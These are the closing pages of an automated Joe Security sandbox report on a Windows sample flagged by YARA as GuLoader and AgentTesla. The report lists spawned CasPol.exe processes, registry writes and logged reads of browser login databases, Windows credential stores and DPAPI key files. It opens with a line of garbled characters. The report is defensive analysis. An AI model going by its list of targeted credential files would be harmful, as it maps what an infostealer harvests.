qw7ny3hU+7g!"g4!N/rID;Ow+<K4V{O;Svgd!0MwhChP`a9?RzL&IJ"636r3`2RhWiyP')YW.jI_7i"'3T1Fw@wnl_|oB0Qf<|:%z8XkR#;(CuikB#H5(INK!jOxC>c^5hP*'r>Wwpjnj|`XgsS1Qk"8QGm/j(;t).-.~$7g6KxInPA8>|G)-yv?y#SLhN^p[^x[MU[gI<!gUPkWaB<ht
TimestampkBytestransferred
Direction Data
• ref002062022pago062022.exe
• CasPol.exe
• CasPol.exe
• CasPol.exe
• CasPol.exe
• CasPol.exe
• conhost.exe
• svchost.exe
Click to jump to process
Statistics
Behavior
System Behavior
Analysis Process: ref002062022pago062022.exe PID: 3504, Parent PID: 8512
Copyright Joe Security LLC 2022 Page 21 of 26
Target ID: 0
Start time: 16:45:47
Start date: 02/06/2022
Path: C:\Users\user\Desktop\ref002062022pago062022.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x400000
File size: 275627 bytes
MD5 hash: 7500C0E8DF88D12316724078FFBEEFAA
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: C, C++ or other language
Yara matches: Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1514512086.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Key Path Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Target ID: 3
Start time: 16:46:05
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x3e0000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: C, C++ or other language
Reputation: moderate
Target ID: 4
Start time: 16:46:05
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x240000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges:
true
General
File Activities
Registry Activities
Analysis Process: CasPol.exe PID: 1664, Parent PID: 3504
General
Analysis Process: CasPol.exe PID: 1740, Parent PID: 3504
General
Copyright Joe Security LLC 2022 Page 22 of 26
Programmed in: C, C++ or other language
Reputation: moderate
Target ID: 5
Start time: 16:46:05
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x200000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: C, C++ or other language
Reputation: moderate
Target ID: 6
Start time: 16:46:06
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x300000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: C, C++ or other language
Reputation: moderate
Target ID: 7
Start time: 16:46:06
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0xce0000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: .Net C# or VB.NET
Yara matches: Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.856205776.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Analysis Process: CasPol.exe PID: 1900, Parent PID: 3504
General
Analysis Process: CasPol.exe PID: 2172, Parent PID: 3504
General
Analysis Process: CasPol.exe PID: 1836, Parent PID: 3504
General
Copyright Joe Security LLC 2022 Page 23 of 26
Reputation: moderate
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Users\user read data or list directory | synchronize
device directory file | synchronous io non alert | open for backup ident | open reparse point
object name collision 1 6E313263 unknown
C:\Users\user\AppData\Roaming read data or list directory | synchronize
device directory file | synchronous io non alert | open for backup ident | open reparse point
object name collision 1 6E313263 unknown
C:\Users\user read data or list directory | synchronize
device directory file | synchronous io non alert | open for backup ident | open reparse point
object name collision 1 6E313263 unknown
C:\Users\user\AppData\Roaming read data or list directory | synchronize
device directory file | synchronous io non alert | open for backup ident | open reparse point
object name collision 1 6E313263 unknown
File Path Offset Length Value Ascii Completion Count Source Address Symbol
\Device\ConDrv 0 0 75 6e 6b 6e 6f 77 6e unknown success or wait 1 6D1C9B71 WriteFile
\Device\ConDrv 30 30 75 6e 6b 6e 6f 77 6e unknown success or wait 1 6D1C9B71 WriteFile
File Path Offset Length Completion Count Source Address Symbol
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6E31099B unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll.aux
unknown 176 success or wait 1 6E2662DE ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31D97A ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31D97A ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31D97A ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll.aux
unknown 620 success or wait 1 6E2662DE ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\96b2b7229c43d2712ff1bf4906a723f6\System.Configuration.ni.dll.aux
unknown 864 success or wait 1 6E2662DE ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\62fe5fc1b5bafb28a19a2754318abf00\System.Core.ni.dll.aux
unknown 900 success or wait 1 6E2662DE ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\5a5dc2f9e9c66b74d361d490c1f4357b\System.Xml.ni.dll.aux
unknown 748 success or wait 1 6E2662DE ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 8171 end of file 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\ccd32e22ed1b362ccbd4b6fe2cda6d0b\System.Management.ni.dll.aux
unknown 764 success or wait 1 6E2662DE ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 success or wait 1 6D1C9B71 ReadFile
File Activities
File Created
File Written
File Read
Copyright Joe Security LLC 2022 Page 24 of 26
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data unknown 49152 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 success or wait 3 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 624 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Program Files (x86)\jDownloader\config\database.script unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Program Files (x86)\jDownloader\config\database.script unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
unknown 45056 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612
unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3425316567-2969588382-3778222414-1001\4280e3d2-e3f0-4650-bde8-f55a3425c6eb
unknown 4096 success or wait 2 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612
unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
unknown 11120 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
unknown 11120 success or wait 1 6D1C9B71 ReadFile
File Path Offset Length Completion Count Source Address Symbol
Key Path Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS success or wait 1 6C45FDB8 unknown
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
EnableFileTracing
dword 0 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
EnableAutoFileTracing
dword 0 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
EnableConsoleTracing
dword 0 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
FileTracingMask dword -65536 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
ConsoleTracingMask
dword -65536 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
MaxFileSize dword 1048576 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
FileDirectory expand unicode %windir%\tracing success or wait 1 6C45FDB8 unknown
Registry Activities
Key Created
Key Value Created
Copyright Joe Security LLC 2022 Page 25 of 26
Target ID: 8
Start time: 16:46:06
Start date: 02/06/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff72efe0000
File size: 875008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: C, C++ or other language
Reputation: moderate
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
File Path Offset Length Completion Count Source Address Symbol
Target ID: 36
Start time: 16:52:03
Start date: 02/06/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Imagebase: 0x7ff73d000000
File size: 57360 bytes
MD5 hash: F586835082F632DC8D9404D83BC16316
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: C, C++ or other language
Reputation: moderate
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Key Path Name Type Old Data New Data Completion CountSourceAddress
Symbol
⊘ No disassembly
Analysis Process: conhost.exe PID: 1840, Parent PID: 1836
General
File Activities
Analysis Process: svchost.exe PID: 1900, Parent PID: 888
General
Registry Activities
Disassembly
Copyright Joe Security LLC 2022 Page 26 of 26